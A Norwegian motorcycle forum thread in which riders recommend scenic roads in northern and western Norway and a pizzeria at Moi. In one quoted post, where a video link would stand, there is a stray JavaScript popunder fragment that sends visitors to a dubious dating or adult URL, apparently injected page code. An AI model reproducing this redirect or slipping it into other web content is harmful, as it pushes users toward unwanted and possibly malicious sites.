Ting man må se eller oppleve med sykkelen!

Generelt om MC, nyheter, hendelser, film & bilder, MC i media, kjøreopplæring osv.
Svar
Brukeravatar
JohnnyTh
Innlegg: 3439
Registrert: 24 aug 2010, 13:20
Motorsykkelen din: BMW R1250GSA
Sted: Lista

Re: Ting man må se eller oppleve med sykkelen!

Legg inn av JohnnyTh »

AJ skrev: 12 aug 2023, 20:36
SveinHa skrev: 12 aug 2023, 18:46
Carpa skrev: 05 okt 2012, 12:20 De svingene der så skumle ut for en nybegynner, spesielt når man må kjøre nedover.....
Ja, de er ikke helt plankekjøring... Har bare tatt de med bil jeg da, her en filmsnutt med Range Rover TDV8:
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Ojsann!
Det var en ny og ukjent vei for meg!
Også midt i et av mine favorittområder når det gjelder MC-kjøring :crazy: .
Hadde store planer om en FV44 tur med avstikkere i sommer, men sommermånedene flyr avsted og et av forsøkene på å komme med dit tidligere i sommer ble stoppet av et stort antall veiarbeidsstrekninger og stengte veier...
Du får si ifra når du skal på di kanter. Kanskje jeg har noen flere forslag til veier. Har også sengeplass hvis det trengs.
Bikers do it all the time, why dont humans. -Jerremy Clarkson, Top Gear.

Brukeravatar
rolf-arne
Innlegg: 2137
Registrert: 20 aug 2018, 20:28
Motorsykkelen din: Pan European 1100 -1995, CBX 1000
Sted: Nordvågen,Nordkapp
Kontakt:

Re: Ting man må se eller oppleve med sykkelen!

Legg inn av rolf-arne »

Bikeridr skrev:Det er jo noen plasser man har sett på to hjul, og veier som er absolutt triveligere å ferdes på uten å bære "befengt" med et bur av glass og metall på alle kanter. :-)

Fra i sommer så kan jeg anbefale veien ut til Hamningberg. Svært flott, og smal, vei. Steinformasjonene langs veien er helt ubeskrivelige. Hele verden ser ut til å stå på høykant. (Noe som visstnok også er tilfellet).
Ifjordfjellet mellom Lakselv og Alta er heller ikke å forakte. :-)

Videre er vel hele Lofoten verdt å nevne, og spesielt ut til Nusfjord. Nå er det lenge siden jeg har kjørt Utakleiv, men tror nok jeg kan anbefale den veien også.

Så går vel turen til Vestlandet. Geiranger, Trollstigen, Ørnesvingene og Dalsnibba er veldig flotte "alpepass" i Norsk målestokk. :-)
Ifjordfjellet, ligger mellom Lakselv( egentlig Lebesby)og Tana.

Sent fra min SM-A715F via Tapatalk

Nyskjærrig - lurer på hva som er bak neste sving - når det er fastslått - så blir man rastlaus og lurer på hva som er bak den neste -- å sånn går livet - av og til tar nyskjærrigheta pause og da kan man avspore ei stund - til å bli kjent med folk og gjøre betjentskaper om til vennskap -- og ikke minst kan kroppen ha sine gode stunder og da gjelder det å enten nyte livet eller få noe gjort. Det siste skyves det ofte på, skal man være ærlig..

Brukeravatar
SveinHa
Innlegg: 374
Registrert: 09 mai 2023, 23:46
Motorsykkelen din: BMW R1100RS 1993
Sted: Carten Island
Kontakt:

Re: Ting man må se eller oppleve med sykkelen!

Legg inn av SveinHa »

AJ skrev: 12 aug 2023, 21:12
SveinHa skrev: 12 aug 2023, 20:56
AJ skrev: 12 aug 2023, 20:36 Ojsann!
Det var en ny og ukjent vei for meg!
Også midt i et av mine favorittområder når det gjelder MC-kjøring :crazy: .
Er du på de kanter må du få deg litt fòr hos Norges "verste" pizzanerd: Rene Munthe Eik https://pizzamani.no/
Selvfølgelig :D !
Som den pizzaelskeren jeg er :crazy: !
Godt tips, takker for det :) .
Da har vi vært innom Fossekallen/Pizzamani på Moi (med bobil, hadde et annet ærend i området) og pizzaen var super den. Vær obs på at bordbestilling må gjøres senest dagen før, derfor ble det takeaway på oss og det gjorde pizzaen litt "vassen" men veldig god likevel. Ble imponert over hvor mye folk som var innom kort tid etter åpning midt på fredagen... Der satt vel 8-9 og spiste, er bord til 12 var nettopp forlatt og en håndfull andre kunder var innom for både pizza og råvarer.
IMG_20230825_151548_538.jpg
IMG_20230825_153710_456.jpg
IMG_20230825_153714_988.jpg
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
Litt om meg og mitt (der er fremdeles noen som er så gamle at de har hjemmeside i stedet for alskens usosiale medier): http://www.sveinha.com/

Mine kjøretøy pr i dag: "NittiNitti": -90 Land Rover 90, "Bimbo": -93 BMW R1100RS, "Helmut": -08 Knaus Sunliner 808

Svar